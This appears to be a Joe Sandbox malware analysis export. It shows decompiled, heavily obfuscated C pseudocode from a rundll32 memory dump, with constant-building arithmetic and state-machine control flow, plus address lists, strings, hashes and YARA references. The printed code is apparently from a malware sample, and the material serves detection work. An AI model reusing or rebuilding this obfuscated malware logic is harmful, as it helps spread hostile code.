				void* _t124;
				void* _t133;
				signed int _t137;
				signed int _t140;
				char _t142;
				signed int _t143;
				void* _t146;
				char* _t153;
				void* _t161;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int* _t172;

				_push(_a8);
				_push(_a4);
				_push(0x40);
				E001AD571(_t124);
				_v16 = 0x34d27;
				_v36 = 0x10;
				asm("stosd");
				_t172 =  &(( &_v88)[4]);
				_t143 = 0;
				_t146 = 0x1e95af98;
				asm("stosd");
				_t166 = 0x41;
				asm("stosd");
				_v76 = 0x8915;
				_v76 = _v76 << 1;
				_v76 = _v76 | 0x9bec6489;
				_v76 = _v76 ^ 0x9bed18bf;
				_v80 = 0xa41b;
				_v80 = _v80 / _t166;
				_t167 = 0x29;
				_v80 = _v80 / _t167;
				_v80 = _v80 ^ 0x0000505a;
				_v56 = 0x791d;
				_v56 = _v56 + 0xffffcdb6;
				_v56 = _v56 ^ 0x00007a60;
				_v68 = 0xda7;
				_v68 = _v68 << 6;
				_v68 = _v68 << 7;
				_v68 = _v68 ^ 0x01b4918d;
				_v72 = 0x6199;
				_v72 = _v72 + 0xd912;
				_v72 = _v72 + 0xffff7ece;
				_v72 = _v72 ^ 0x0000cfd3;
				_v64 = 0xad0b;
				_v64 = _v64 + 0xffffabf4;
				_v64 = _v64 ^ 0xee644ac2;
				_v64 = _v64 ^ 0xee647eb7;
				_v44 = 0x3f63;
				_v44 = _v44 + 0xa841;
				_v44 = _v44 ^ 0x0000e7a1;
				_v48 = 0xf613;
				_v48 = _v48 << 5;
				_v48 = _v48 ^ 0x001ec1d2;
				_v52 = 0xc2d6;
				_t168 = 0x24;
				_v52 = _v52 / _t168;
				_v52 = _v52 ^ 0x000077db;
				_v88 = 0x7cd6;
				_v88 = _v88 << 4;
				_v88 = _v88 + 0xfffffcc8;
				_v88 = _v88 >> 4;
				_v88 = _v88 ^ 0x0000340c;
				_v60 = 0x3433;
				_v60 = _v60 << 8;
				_v60 = _v60 | 0x47df43ab;
				_v60 = _v60 ^ 0x47ff574a;
				_v40 = 0xe7e9;
				_v40 = _v40 + 0xffffe492;
				_v40 = _v40 ^ 0x0000e805;
				_v84 = 0xdb36;
				_v84 = _v84 >> 2;
				_v84 = _v84 << 0xc;
				_v84 = _v84 + 0x38f;
				_v84 = _v84 ^ 0x036c82d0;
				while(_t146 != 0x1343546f) {
					if(_t146 == 0x1e95af98) {
						_t146 = 0x34c9c2df;
						continue;
					}
					if(_t146 == 0x34c9c2df) {
						_t140 = E001B4042(_v76,  &_v36, _v80,  &_v32);
						__eflags = _t140;
						if(_t140 == 0) {
							L20:
							return _t143;
						}
						_t146 = 0x3624db55;
						continue;
					}
					if(_t146 != 0x3624db55) {
						L19:
						__eflags = _t146 - 0x20971cc1;
						if(_t146 != 0x20971cc1) {
							continue;
						}
						goto L20;
					}
					_t153 =  &_v32;
					if(_v32 == 0) {
						L14:
						_t146 = 0x1343546f;
						continue;
					} else {
						goto L6;
					}
					do {
						L6:
						_t142 =  *_t153;
						if(_t142 < 0x30 || _t142 > 0x39) {
							if(_t142 < 0x61 || _t142 > 0x7a) {
								if(_t142 < 0x41 || _t142 > 0x5a) {
									 *_t153 = 0x58;
								}
							}
						}
						_t153 = _t153 + 1;
					} while ( *_t153 != 0);
					goto L14;
				}
				_push(0x1001f760);
				_push(_v72);
				_t133 = E001A27F4(_v56, _v68);
				_push(E001A33AB(__eflags));
				_push( &_v32);
				_push(_v88);
				_push(_v52);
				_push(_t133);
				_push(_v48);
				_push(_a8);
				_t161 = 0x40;
				_t137 = E001A56FF(_t161, __eflags);
				__eflags = _t137;
				_t123 = _t137 > 0;
				__eflags = _t123;
				_t143 = 0 | _t123;
				E001AED35(_v60, _t133, _v40, _v84);
				_t172 =  &(_t172[0xb]);
				_t146 = 0x20971cc1;
				goto L19;
			}

0x001a6a76
0x001a6a7a
0x001a6a7e
0x001a6a81
0x001a6a86
0x001a6a92
0x001a6a9c
0x001a6a9d
0x001a6aa2
0x001a6aa4
0x001a6aa9
0x001a6aac
0x001a6aaf
0x001a6ab0
0x001a6ab8
0x001a6abc
0x001a6ac4
0x001a6acc
0x001a6adc
0x001a6ae4
0x001a6ae9
0x001a6aef
0x001a6af7
0x001a6aff
0x001a6b07
0x001a6b0f
0x001a6b17
0x001a6b1c
0x001a6b21
0x001a6b29
0x001a6b31
0x001a6b39
0x001a6b41
0x001a6b49
0x001a6b51
0x001a6b59
0x001a6b61
0x001a6b69
0x001a6b71
0x001a6b79
0x001a6b81
0x001a6b89
0x001a6b8e
0x001a6b96
0x001a6ba2
0x001a6ba5
0x001a6ba9
0x001a6bb1
0x001a6bb9
0x001a6bbe
0x001a6bc6
0x001a6bcb
0x001a6bd3
0x001a6bdb
0x001a6be0
0x001a6be8
0x001a6bf0
0x001a6bf8
0x001a6c00
0x001a6c08
0x001a6c10
0x001a6c15
0x001a6c1a
0x001a6c27
0x001a6c34
0x001a6c3e
0x001a6ca9
0x00000000
0x001a6ca9
0x001a6c42
0x001a6c93
0x001a6c9a
0x001a6c9c
0x001a6d25
0x001a6d2b
0x001a6d2b
0x001a6ca2
0x00000000
0x001a6ca2
0x001a6c4a
0x001a6d16
0x001a6d16
0x001a6d1c
0x00000000
0x00000000
0x00000000
0x001a6d1c
0x001a6c55
0x001a6c59
0x001a6c7e
0x001a6c7e
0x00000000
0x00000000
0x00000000
0x00000000
0x001a6c5b
0x001a6c5b
0x001a6c5b
0x001a6c5f
0x001a6c67
0x001a6c6f
0x001a6c75
0x001a6c75
0x001a6c6f
0x001a6c67
0x001a6c78
0x001a6c79
0x00000000
0x001a6c5b
0x001a6cad
0x001a6cb2
0x001a6cbe
0x001a6cce
0x001a6cd3
0x001a6cd4
0x001a6cd8
0x001a6cdc
0x001a6cdd
0x001a6ce5
0x001a6cee
0x001a6cef
0x001a6d04
0x001a6d06
0x001a6d06
0x001a6d06
0x001a6d09
0x001a6d0e
0x001a6d11
0x00000000

Strings

`z, xrefs: 001A6B07
ZP, xrefs: 001A6AEF
c?, xrefs: 001A6B69
34, xrefs: 001A6BD3

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 34$ZP$`z$c?
API String ID: 0-1162272853
Opcode ID: 73ff85cbce4dac8b3a2d2e260e1fbdf22268e967b06b2fcfc9108cf1c87b94fc
Instruction ID: 8e9f14945ec99510ff713bba16935b725e15ce30451a2eb403f92b4ef1ebb45f
Opcode Fuzzy Hash: 73ff85cbce4dac8b3a2d2e260e1fbdf22268e967b06b2fcfc9108cf1c87b94fc
Instruction Fuzzy Hash: 2D6186755083409FD325CF25C84951BBBE1FBCA758F088A1DF2D6962A0C3B88A0ACF47

Uniqueness

Uniqueness Score: -1.00%

Function 001AE499, Relevance: 5.2, Strings: 4, Instructions: 166
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E001AE499(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t152;
				void* _t164;
				void* _t179;
				signed int _t189;
				signed int _t190;
				void* _t192;
				signed int* _t195;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AD571(_t152);
				_v24 = 0x1a3a;
				_t195 =  &(( &_v68)[6]);
				_v24 = _v24 | 0xad9fd8e9;
				_v24 = _v24 ^ 0xad9fdafa;
				_t192 = 0;
				_v48 = 0xc7a1;
				_t179 = 0x2d416ecf;
				_v48 = _v48 + 0xffff41dd;
				_t189 = 0x6d;
				_v48 = _v48 / _t189;
				_v48 = _v48 << 6;
				_v48 = _v48 ^ 0x00000581;
				_v32 = 0x64b;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 | 0xfafc5bd4;
				_v32 = _v32 ^ 0xbafc5bd4;
				_v52 = 0xa266;
				_t190 = 0x19;
				_v52 = _v52 * 0x23;
				_v52 = _v52 + 0xfffff7b9;
				_v52 = _v52 | 0x9bf494f1;
				_v52 = _v52 ^ 0xdbf6bffb;
				_v16 = 0xc005;
				_v16 = _v16 + 0x2f17;
				_v16 = _v16 ^ 0x0000df6d;
				_v20 = 0x3b6c;
				_v20 = _v20 + 0xa132;
				_v20 = _v20 ^ 0x0000abee;
				_v56 = 0xa633;
				_v56 = _v56 / _t190;
				_v56 = _v56 << 9;
				_v56 = _v56 >> 3;
				_v56 = _v56 ^ 0x0001f977;
				_v60 = 0x81c7;
				_v60 = _v60 | 0x7ad0d342;
				_v60 = _v60 ^ 0x5d30e79b;
				_v60 = _v60 + 0x7d28;
				_v60 = _v60 ^ 0x27e0a525;
				_v64 = 0xbe3d;
				_v64 = _v64 >> 0xd;
				_v64 = _v64 ^ 0x72fbf895;
				_v64 = _v64 << 1;
				_v64 = _v64 ^ 0xe5f7a6ca;
				_v36 = 0x30c1;
				_v36 = _v36 * 0x51;
				_v36 = _v36 << 9;
				_v36 = _v36 ^ 0x1eda5d7d;
				_v28 = 0xa691;
				_v28 = _v28 ^ 0x0772a608;
				_v28 = _v28 ^ 0x07721c41;
				_v68 = 0xa1e1;
				_v68 = _v68 + 0xfffff639;
				_v68 = _v68 * 0x72;
				_v68 = _v68 | 0xb783fd02;
				_v68 = _v68 ^ 0xb7c3d808;
				_v8 = 0x8e95;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x023a3239;
				_v40 = 0xde71;
				_v40 = _v40 | 0x41145b6e;
				_v40 = _v40 >> 3;
				_v40 = _v40 >> 0xc;
				_v40 = _v40 ^ 0x0000d444;
				_v12 = 0xe362;
				_v12 = _v12 << 0xe;
				_v12 = _v12 ^ 0x38d8c6cf;
				_v44 = 0x3755;
				_v44 = _v44 + 0xffff2006;
				_v44 = _v44 + 0x8cc7;
				_v44 = _v44 + 0xd944;
				_v44 = _v44 ^ 0x00008c64;
				do {
					while(_t179 != 0x14139bdc) {
						if(_t179 == 0x1afa3c13) {
							E001BA4BF(_v8, _a12, _v40, _t192,  &_v4, _v12, _v44, _a4, _v52 | _v48);
						} else {
							if(_t179 == 0x2d416ecf) {
								_t179 = 0x14139bdc;
								continue;
							} else {
								if(_t179 != 0x3272b602) {
									goto L11;
								} else {
									_push(_t179);
									_push(_t179);
									_t192 = E001B922B(_v4 + _v4);
									_t195 =  &(_t195[3]);
									if(_t192 != 0) {
										_t179 = 0x1afa3c13;
										continue;
									}
								}
							}
						}
						L14:
						return _t192;
					}
					_t164 = E001BA4BF(_v16, _a12, _v20, 0,  &_v4, _v56, _v60, _a4, _v32 | _v24);
					_t195 =  &(_t195[7]);
					if(_t164 == 0) {
						_t179 = 0x11f88af4;
						goto L11;
					} else {
						_t179 = 0x3272b602;
						continue;
					}
					goto L14;
					L11:
				} while (_t179 != 0x11f88af4);
				goto L14;
			}

0x001ae4a0
0x001ae4a4
0x001ae4a8
0x001ae4ac
0x001ae4b0
0x001ae4b1
0x001ae4b2
0x001ae4b7
0x001ae4bf
0x001ae4c2
0x001ae4cc
0x001ae4d4
0x001ae4d6
0x001ae4de
0x001ae4e3
0x001ae4f1
0x001ae4f6
0x001ae4fc
0x001ae501
0x001ae509
0x001ae511
0x001ae516
0x001ae51e
0x001ae526
0x001ae533
0x001ae534
0x001ae538
0x001ae540
0x001ae548
0x001ae550
0x001ae558
0x001ae560
0x001ae568
0x001ae570
0x001ae578
0x001ae580
0x001ae58e
0x001ae592
0x001ae597
0x001ae59c
0x001ae5a4
0x001ae5ac
0x001ae5b4
0x001ae5bc
0x001ae5c4
0x001ae5cc
0x001ae5d4
0x001ae5d9
0x001ae5e1
0x001ae5e5
0x001ae5ed
0x001ae5fa
0x001ae5fe
0x001ae603
0x001ae60b
0x001ae613
0x001ae61b
0x001ae623
0x001ae62b
0x001ae638
0x001ae63c
0x001ae644
0x001ae64c
0x001ae654
0x001ae659
0x001ae661
0x001ae669
0x001ae676
0x001ae680
0x001ae68a
0x001ae692
0x001ae69a
0x001ae69f
0x001ae6a7
0x001ae6af
0x001ae6b7
0x001ae6bf
0x001ae6c7
0x001ae6cf
0x001ae6cf
0x001ae6d5
0x001ae78f
0x001ae6db
0x001ae6e1
0x001ae716
0x00000000
0x001ae6e3
0x001ae6e5
0x00000000
0x001ae6e7
0x001ae6fb
0x001ae6fc
0x001ae705
0x001ae707
0x001ae70c
0x001ae712
0x00000000
0x001ae712
0x001ae70c
0x001ae6e5
0x001ae6e1
0x001ae798
0x001ae7a0
0x001ae7a0
0x001ae742
0x001ae747
0x001ae74c
0x001ae755
0x00000000
0x001ae74e
0x001ae74e
0x00000000
0x001ae74e
0x00000000
0x001ae75a
0x001ae75a
0x00000000

Strings

U7, xrefs: 001AE6A7
(}, xrefs: 001AE5BC
l;, xrefs: 001AE568
b, xrefs: 001AE692

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: (}$U7$b$l;
API String ID: 0-3276533828
Opcode ID: 7b5782f7b12f07bb30f723950e6dbe38a334be5ea2f74ed4591f36c6f59dd4f5
Instruction ID: 61c1d22624f9a20ed686f09956048ebbb5d9cf91721a4cba08b9fb0752c3ec46
Opcode Fuzzy Hash: 7b5782f7b12f07bb30f723950e6dbe38a334be5ea2f74ed4591f36c6f59dd4f5
Instruction Fuzzy Hash: 75714F711083819FD398CF65C88982BBBE1BBD4758F104E1CF59696260D3B9CA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 001A2F97, Relevance: 5.2, Strings: 4, Instructions: 156
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E001A2F97(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t127;
				void* _t138;
				void* _t141;
				void* _t143;
				void* _t144;
				void* _t146;
				intOrPtr _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				signed int* _t173;

				_push(_a16);
				_t166 = _a12;
				_t144 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AD571(_t127);
				_v60 = 0x361f2e;
				_t167 = 0;
				_v56 = 0x63c48e;
				_t173 =  &(( &_v108)[6]);
				_v52 = 0;
				_v48 = 0;
				_t146 = 0x2c5b8c0b;
				_v96 = 0x4740;
				_v96 = _v96 + 0xd67b;
				_v96 = _v96 + 0xffff7380;
				_v96 = _v96 + 0xfffffa0b;
				_v96 = _v96 ^ 0x0000c8a1;
				_v76 = 0x144d;
				_v76 = _v76 | 0xc07f0e53;
				_v76 = _v76 + 0xffff1723;
				_v76 = _v76 ^ 0xc07e2de7;
				_v80 = 0x577f;
				_t168 = 0x57;
				_v80 = _v80 * 0x14;
				_v80 = _v80 / _t168;
				_v80 = _v80 ^ 0x00003eae;
				_v84 = 0xb41e;
				_v84 = _v84 ^ 0xcc40aa96;
				_v84 = _v84 ^ 0x60a37713;
				_v84 = _v84 ^ 0xace33089;
				_v88 = 0xdfc4;
				_v88 = _v88 + 0x9f52;
				_v88 = _v88 + 0xb204;
				_v88 = _v88 ^ 0x00025ac8;
				_v92 = 0xe968;
				_v92 = _v92 << 9;
				_v92 = _v92 + 0xffff259d;
				_v92 = _v92 ^ 0x01d18af9;
				_v100 = 0xdbae;
				_v100 = _v100 + 0xfffffefa;
				_v100 = _v100 | 0x0cea93cf;
				_v100 = _v100 << 0xd;
				_v100 = _v100 ^ 0x5b7daf02;
				_v68 = 0xb82e;
				_v68 = _v68 | 0xee8c70ca;
				_v68 = _v68 ^ 0xee8cac99;
				_v104 = 0x988c;
				_t169 = 0x4d;
				_v104 = _v104 * 0x66;
				_v104 = _v104 + 0xc3b0;
				_v104 = _v104 >> 8;
				_v104 = _v104 ^ 0x00002a0f;
				_v108 = 0x80b5;
				_v108 = _v108 ^ 0x0d958633;
				_v108 = _v108 >> 0xd;
				_v108 = _v108 + 0xd353;
				_v108 = _v108 ^ 0x00010667;
				_v72 = 0x685d;
				_v72 = _v72 >> 0xc;
				_v72 = _v72 / _t169;
				_v72 = _v72 ^ 0x00007b51;
				_v64 = 0xeab0;
				_t170 = 0x77;
				_v64 = _v64 / _t170;
				_v64 = _v64 ^ 0x00003c21;
				while(_t146 != 0xfa06235) {
					if(_t146 == 0x1b9e3483) {
						E001BC395(_v96,  &_v44, _t144, _v76);
						_t146 = 0x39405414;
						continue;
					} else {
						if(_t146 == 0x2c5b8c0b) {
							_t146 = 0x1b9e3483;
							continue;
						} else {
							if(_t146 == 0x348cdc2c) {
								_t141 = E001B2DA9( &_v44, _v100, _v68, _v104, _t166 + 4, _v108);
								_t173 =  &(_t173[4]);
								__eflags = _t141;
								if(__eflags != 0) {
									_t146 = 0xfa06235;
									continue;
								}
							} else {
								if(_t146 != 0x39405414) {
									L13:
									__eflags = _t146 - 0x166af0ff;
									if(__eflags != 0) {
										continue;
									}
								} else {
									_t143 = E001B2DA9( &_v44, _v80, _v84, _v88, _t166, _v92);
									_t173 =  &(_t173[4]);
									if(_t143 != 0) {
										_t146 = 0x348cdc2c;
										continue;
									}
								}
							}
						}
					}
					return _t167;
				}
				_t138 = E001A2945( &_v44, _v72, __eflags, _v64, _t166 + 8);
				_t173 =  &(_t173[2]);
				__eflags = _t138;
				_t167 =  !=  ? 1 : _t167;
				_t146 = 0x166af0ff;
				goto L13;
			}

0x001a2f9e
0x001a2fa5
0x001a2fac
0x001a2fae
0x001a2faf
0x001a2fb6
0x001a2fbd
0x001a2fbe
0x001a2fbf
0x001a2fc4
0x001a2fcc
0x001a2fce
0x001a2fd6
0x001a2fd9
0x001a2fdf
0x001a2fe3
0x001a2fe8
0x001a2ff0
0x001a2ff8
0x001a3000
0x001a3008
0x001a3010
0x001a3018
0x001a3020
0x001a3028
0x001a3030
0x001a303f
0x001a3042
0x001a304e
0x001a3052
0x001a305a
0x001a3062
0x001a306a
0x001a3072
0x001a307a
0x001a3082
0x001a308a
0x001a3092
0x001a309a
0x001a30a2
0x001a30a7
0x001a30af
0x001a30b7
0x001a30bf
0x001a30c7
0x001a30cf
0x001a30d4
0x001a30dc
0x001a30e4
0x001a30ec
0x001a30f4
0x001a3101
0x001a3102
0x001a3106
0x001a310e
0x001a3113
0x001a311b
0x001a3123
0x001a312b
0x001a3130
0x001a3138
0x001a3140
0x001a3148
0x001a3153
0x001a3157
0x001a315f
0x001a316f
0x001a3177
0x001a317b
0x001a3183
0x001a3191
0x001a321a
0x001a3221
0x00000000
0x001a3193
0x001a3199
0x001a3203
0x00000000
0x001a319b
0x001a31a1
0x001a31f3
0x001a31f8
0x001a31fb
0x001a31fd
0x001a31ff
0x00000000
0x001a31ff
0x001a31a3
0x001a31a9
0x001a3250
0x001a3250
0x001a3256
0x00000000
0x00000000
0x001a31af
0x001a31c4
0x001a31c9
0x001a31ce
0x001a31d4
0x00000000
0x001a31d4
0x001a31ce
0x001a31a9
0x001a31a1
0x001a3199
0x001a3265
0x001a3265
0x001a323b
0x001a3242
0x001a3246
0x001a3248
0x001a324b
0x00000000

Strings

@G, xrefs: 001A2FE8
!<, xrefs: 001A317B
h, xrefs: 001A309A
Q{, xrefs: 001A3157

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !<$@G$Q{$h
API String ID: 0-1160312082
Opcode ID: 5a1d022b1b9fd1dc9dec7fb45cb6ab5411a438a9600b4cf95d8e450e5b78ab00
Instruction ID: 26768f7f8013833d36db22bd0bcef695ab1b46abe2839da26f6fc0ddd6fb1b74
Opcode Fuzzy Hash: 5a1d022b1b9fd1dc9dec7fb45cb6ab5411a438a9600b4cf95d8e450e5b78ab00
Instruction Fuzzy Hash: 9B6186754083419FD358CF25C88992BFBE1BBC5358F408E1EF4A6962A0D7B5CA098F97

Uniqueness

Uniqueness Score: -1.00%

Function 001AC44B, Relevance: 5.1, Strings: 4, Instructions: 146
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E001AC44B(intOrPtr __ecx, intOrPtr* __edx) {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _t120;
				signed int _t125;
				signed int _t127;
				intOrPtr _t128;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				signed int _t146;
				void* _t147;
				signed int _t150;
				intOrPtr* _t153;
				signed int* _t154;

				_t154 =  &_v564;
				_v536 = 0x5a08;
				_v536 = _v536 | 0xb841b3d1;
				_v536 = _v536 << 8;
				_v536 = _v536 ^ 0x41fbf5e5;
				_v524 = 0x1bb5;
				_v524 = _v524 | 0x1fc37f08;
				_v524 = _v524 ^ 0x1fc367a6;
				_v528 = 0x1421;
				_t153 = __edx;
				_t128 = __ecx;
				_t147 = 0x1ed04b15;
				_t130 = 0x6f;
				_v528 = _v528 / _t130;
				_v528 = _v528 ^ 0x00007e1e;
				_v544 = 0xd073;
				_v544 = _v544 << 5;
				_v544 = _v544 << 2;
				_v544 = _v544 ^ 0x00685a54;
				_v556 = 0x91e6;
				_v556 = _v556 + 0xffff91b4;
				_v556 = _v556 >> 8;
				_v556 = _v556 << 9;
				_v556 = _v556 ^ 0x00003d2d;
				_v564 = 0x9352;
				_v564 = _v564 << 0xe;
				_v564 = _v564 + 0xffff4f54;
				_t131 = 0x74;
				_v564 = _v564 * 0x26;
				_v564 = _v564 ^ 0x7770de4f;
				_v532 = 0x91f1;
				_v532 = _v532 + 0xffffadbd;
				_v532 = _v532 ^ 0x00001bea;
				_v552 = 0xd3ea;
				_v552 = _v552 + 0x7337;
				_v552 = _v552 >> 0xd;
				_v552 = _v552 | 0x8386dcfa;
				_v552 = _v552 ^ 0x8386e5f5;
				_v560 = 0x60cf;
				_v560 = _v560 + 0xffff84a3;
				_v560 = _v560 >> 9;
				_t146 = _v532;
				_v560 = _v560 / _t131;
				_v560 = _v560 ^ 0x00013446;
				_v540 = 0xb068;
				_t132 = 0x2b;
				_v540 = _v540 / _t132;
				_v540 = _v540 << 2;
				_v540 = _v540 ^ 0x00004da8;
				_v548 = 0xbeec;
				_v548 = _v548 ^ 0xb2af735b;
				_v548 = _v548 * 0x7d;
				_v548 = _v548 + 0x1fa5;
				_v548 = _v548 ^ 0x3fd7d166;
				while(_t147 != 0xa2eaa3) {
					if(_t147 == 0x1d9f6e57) {
						_push(_v560);
						_push(_v552);
						_push(0);
						_push(_v532);
						_push(0);
						_push(_v564);
						_push( &_v520);
						_push(0);
						_t120 = E001B41AD(_v556, __eflags);
						_t154 =  &(_t154[8]);
						asm("sbb esi, esi");
						_t150 =  ~_t120 & 0x352323de;
						L9:
						_t147 = _t150 + 0xa2eaa3;
						continue;
					}
					if(_t147 != 0x1ed04b15) {
						if(_t147 == 0x20b7e9af) {
							_t125 = E001A1B46(_t128, _t153, 0x1001f1d0,  &_v520);
							asm("sbb esi, esi");
							_pop(_t132);
							_t150 =  ~_t125 & 0x1cfc83b4;
							__eflags = _t150;
							goto L9;
						} else {
							if(_t147 == 0x35c60e81) {
								 *((intOrPtr*)(_t146 + 0x1c)) = _t128;
								_t127 =  *0x10020718;
								 *(_t146 + 8) = _t127;
								 *0x10020718 = _t146;
								return _t127;
							}
							L14:
							__eflags = _t147 - 0xc0fab83;
							if(__eflags != 0) {
								continue;
							} else {
								return _t125;
							}
						}
						L7:
						return _t125;
					}
					_push(_t132);
					_push(_t132);
					_t125 = E001B922B(0x38);
					_t146 = _t125;
					_t154 =  &(_t154[3]);
					__eflags = _t146;
					if(__eflags != 0) {
						_t147 = 0x20b7e9af;
						continue;
					}
					goto L7;
				}
				E001AE380(_v540, _t146, _v548);
				_pop(_t132);
				_t147 = 0xc0fab83;
				goto L14;
			}

0x001ac44b
0x001ac451
0x001ac459
0x001ac461
0x001ac466
0x001ac46e
0x001ac476
0x001ac47e
0x001ac486
0x001ac496
0x001ac498
0x001ac49e
0x001ac4a3
0x001ac4a8
0x001ac4ae
0x001ac4b6
0x001ac4be
0x001ac4c3
0x001ac4c8
0x001ac4d0
0x001ac4d8
0x001ac4e0
0x001ac4e5
0x001ac4ea
0x001ac4f2
0x001ac4fa
0x001ac4ff
0x001ac50c
0x001ac50f
0x001ac513
0x001ac51b
0x001ac523
0x001ac52b
0x001ac533
0x001ac53b
0x001ac543
0x001ac548
0x001ac550
0x001ac558
0x001ac560
0x001ac568
0x001ac575
0x001ac579
0x001ac57d
0x001ac585
0x001ac591
0x001ac594
0x001ac598
0x001ac59d
0x001ac5a5
0x001ac5ad
0x001ac5ba
0x001ac5be
0x001ac5c6
0x001ac5ce
0x001ac5e0
0x001ac673
0x001ac67b
0x001ac67f
0x001ac681
0x001ac685
0x001ac687
0x001ac68f
0x001ac690
0x001ac692
0x001ac697
0x001ac69e
0x001ac6a0
0x001ac63f
0x001ac63f
0x00000000
0x001ac63f
0x001ac5ec
0x001ac5f4
0x001ac62c
0x001ac636
0x001ac638
0x001ac639
0x001ac639
0x00000000
0x001ac5f6
0x001ac5fc
0x001ac602
0x001ac605
0x001ac60a
0x001ac60d
0x00000000
0x001ac60d
0x001ac6bd
0x001ac6bd
0x001ac6c3
0x00000000
0x00000000
0x00000000
0x00000000
0x001ac6c3
0x001ac61d
0x001ac61d
0x001ac61d
0x001ac657
0x001ac658
0x001ac65b
0x001ac660
0x001ac662
0x001ac665
0x001ac667
0x001ac669
0x00000000
0x001ac669
0x00000000
0x001ac667
0x001ac6b2
0x001ac6b7
0x001ac6b8
0x00000000

Strings

-=, xrefs: 001AC4EA
es-EC, xrefs: 001AC605, 001AC60D
7s, xrefs: 001AC53B
TZh, xrefs: 001AC4C8

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: -=$7s$TZh$es-EC
API String ID: 0-941498730
Opcode ID: 127492397a97407208006ae62ccf380d7e669ff10b8319f7160015f5e7bc63e1
Instruction ID: d17b65223501b02c9a243a8672c3f9e35870c69e0ed15e59317bce8d402e3462
Opcode Fuzzy Hash: 127492397a97407208006ae62ccf380d7e669ff10b8319f7160015f5e7bc63e1
Instruction Fuzzy Hash: E1519C729083019BD358CF25C48951BBBE1FBC8758F145A1DF4A9A72A0D3B8DA49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 001BBD5E, Relevance: 5.1, Strings: 4, Instructions: 129
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E001BBD5E(void* __ecx, void* __edi, void* __eflags) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				int _t164;
				signed int _t167;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t177;
				void* _t194;
				void* _t198;
				signed int _t200;

				_v48 = 0x827d;
				_v48 = _v48 ^ 0xc33c0e11;
				_v48 = _v48 * 0x34;
				_t198 = __ecx;
				_v48 = _v48 >> 0xb;
				_v48 = _v48 ^ 0x00150998;
				_v8 = 0xc4b3;
				_v8 = _v8 + 0xc6a6;
				_v8 = _v8 ^ 0x00018b49;
				_v28 = 0x2b58;
				_t169 = 0x57;
				_v28 = _v28 * 0x2b;
				_v28 = _v28 / _t169;
				_v28 = _v28 ^ 0x00001564;
				_v40 = 0x6b06;
				_v40 = _v40 | 0xdd17abbc;
				_v40 = _v40 + 0xffff0e69;
				_v40 = _v40 ^ 0xdd16fa37;
				_v12 = 0x4364;
				_v12 = _v12 ^ 0x4daed734;
				_v12 = _v12 ^ 0x4daee758;
				_v16 = 0xb89e;
				_v16 = _v16 + 0x78b7;
				_v16 = _v16 ^ 0x00012eeb;
				_v52 = 0xd888;
				_v52 = _v52 + 0x9bff;
				_v52 = _v52 + 0xaea6;
